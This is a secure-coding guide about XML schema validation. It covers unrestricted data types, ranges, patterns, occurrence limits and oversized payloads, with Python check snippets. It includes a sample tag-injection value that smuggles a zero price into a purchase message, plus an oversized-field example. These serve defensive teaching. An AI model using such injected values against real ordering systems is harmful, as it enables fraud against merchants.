Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and adds a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element set to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
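&lt;br /&gt;
The effect of first-match processing can be sketched in Python with xml.etree.ElementTree from the standard library. The message is rebuilt element by element to mirror the tampered document above; the variable names and the list of expected children are illustrative assumptions, not part of any real application.&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# Recreate the tampered message: id=123, price=0, an empty id, price=10.
buy = ET.Element("buy")
for tag, text in (("id", "123"), ("price", "0"), ("id", None), ("price", "10")):
    ET.SubElement(buy, tag).text = text
message = ET.fromstring(ET.tostring(buy))

# Naive processing: the first matching element wins, so the bogus price is used.
first_price = message.find("price").text
all_prices = [price.text for price in message.findall("price")]

# A structural check that accepts exactly one id followed by one price.
expected_children = ["id", "price"]
structure_ok = [child.tag for child in message] == expected_children

print(first_price, all_prices, structure_ok)
```
The lookup returns the attacker's price of 0, while the structural check fails because the message has four children instead of two; a schema with a fixed sequence enforces the same rule declaratively.&lt;br /&gt;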
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The elements &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are both defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after these definitions. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters when a dedicated data type exists. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the whole value valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially set for the element, which means that the information was probably tested by application code instead of the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid that logical vulnerability, the schema should declare &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
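&lt;br /&gt;
The logical flaw is easy to reproduce in a few lines of Python. The sketch below is hypothetical application code, not taken from any real system: the function names are invented, and int() is only an approximation of the integer data type because it accepts some inputs that a schema validator would reject.&lt;br /&gt;
```python
from decimal import Decimal


def order_total(price: str, quantity: str) -> Decimal:
    """Mirror price*quantity when quantity is only known to be an integer."""
    return Decimal(price) * int(quantity)


def order_total_positive(price: str, quantity: str) -> Decimal:
    """Same calculation, but reject anything outside the positiveInteger range."""
    units = int(quantity)
    if not units >= 1:
        raise ValueError("quantity must be 1 or greater")
    return Decimal(price) * units


print(order_total("10", "1"))    # the legitimate order
print(order_total("10", "-3"))   # a negative quantity yields a negative total
```
With the second function the negative quantity raises an error before any arithmetic happens, which is the behaviour a positiveInteger declaration gives at validation time.&lt;br /&gt;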
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML Schema provides data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly chosen for values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
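Because &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; is declared as &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt;, a value of Infinity or NaN is not valid and is rejected during validation, so it cannot trigger errors in the application. If those values were allowed, for instance by declaring the element as &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt;, an attacker could exploit the issue.&lt;br /&gt;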
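&lt;br /&gt;
The difference between the two families of types can be illustrated in Python. In this sketch float() plays the role of the float and double data types, and a regular expression approximates the lexical form of decimal (an optional sign followed by digits with an optional fraction); the names are invented for the example, and the expression is a simplification rather than a full validator.&lt;br /&gt;
```python
import math
import re

# Approximate lexical form of the decimal data type: no exponent, no specials.
XS_DECIMAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")


def is_xs_decimal(text: str) -> bool:
    """True when `text` looks like a decimal literal such as 10, -3.5 or .25."""
    return XS_DECIMAL.fullmatch(text) is not None


for candidate in ("10", "10.50", "NaN", "INF", "-INF"):
    as_float = float(candidate)  # float accepts every candidate in this list
    print(candidate, math.isfinite(as_float), is_xs_decimal(candidate))
```
Every candidate converts to a float, but only the first two are finite and only those two match the decimal form, so a decimal declaration keeps the special values away from later arithmetic.&lt;br /&gt;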
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
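&lt;br /&gt;
As a defense-in-depth measure, the same bounds can be re-checked in application code after validation. The following is a minimal Python sketch and not part of the schema itself; the constant and function names are hypothetical, and the limits are copied from the &amp;lt;tt&amp;gt;minLength&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxLength&amp;lt;/tt&amp;gt; example above:&lt;br /&gt;

```python
# Hypothetical names; the bounds mirror the minLength/maxLength facets above.
MIN_NAME_LENGTH = 3
MAX_NAME_LENGTH = 256


def name_length_is_valid(name):
    """Return True when the name length falls within the schema bounds."""
    return len(name) in range(MIN_NAME_LENGTH, MAX_NAME_LENGTH + 1)
```

Keeping the limits in named constants makes it easier to keep the application and the schema in agreement when either one changes.&lt;br /&gt;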
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
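&lt;br /&gt;
The same expression can be applied in application code as a second check. This is a minimal Python sketch with hypothetical names; it assumes the value has already been extracted from the document, and it does not reproduce the whitespace collapsing that the &amp;lt;tt&amp;gt;xs:token&amp;lt;/tt&amp;gt; base type performs before the pattern is evaluated:&lt;br /&gt;

```python
import re

# Same expression as the pattern facet above. XSD patterns are implicitly
# anchored, so fullmatch() is used to require that the whole value matches.
SSN_PATTERN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True when value has the form NNN-NN-NNNN."""
    return SSN_PATTERN.fullmatch(value) is not None
```

Using &amp;lt;tt&amp;gt;fullmatch&amp;lt;/tt&amp;gt; rather than &amp;lt;tt&amp;gt;search&amp;lt;/tt&amp;gt; matters here: a partial match would accept values that merely contain something shaped like an SSN.&lt;br /&gt;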
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes in XML schemas. An element or attribute is considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; references the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above described the potential consequences of using data types that allow zero for denominators, and proposed a data type containing only positive values. The opposite approach accepts the entire range of numbers except zero. To avoid disclosing potential errors, values can be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; that disallows the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is never zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
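&lt;br /&gt;
Because assertions require a processor that supports XML Schema 1.1, an application may want to repeat the check itself. A minimal Python sketch, assuming the element text has already been extracted; the function name is hypothetical:&lt;br /&gt;

```python
def parse_denominator(text):
    """Convert element text to an integer and reject zero, like the assertion."""
    value = int(text)
    if value == 0:
        raise ValueError("denominator must not be zero")
    return value
```

Negative values pass through unchanged, which matches the behavior of the assertion in the schema.&lt;br /&gt;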
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined means the application has to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could have a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum number, it could have a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
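&lt;br /&gt;
Where the schema cannot be changed, an application-side cap is one possible stopgap. The sketch below uses Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt;; the limit of 1000 and the function names are assumptions chosen for illustration only:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

MAX_BUY_ELEMENTS = 1000  # hypothetical limit; tune to the application's capacity


def count_buy_elements(operation):
    """Count the direct buy children of an operation element."""
    return len(operation.findall("buy"))


def within_limit(operation, limit=MAX_BUY_ELEMENTS):
    """Return True when the number of buy elements does not exceed the limit."""
    return limit >= count_buy_elements(operation)


# Usage: build a small operation element in memory and check it.
operation = ET.Element("operation")
for _ in range(3):
    ET.SubElement(operation, "buy")
print(within_limit(operation))
```

Note that this check runs after the document has been parsed, so it limits later processing but not the memory used by the parser itself; a bounded &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; in the schema remains the earlier line of defense.&lt;br /&gt;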
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
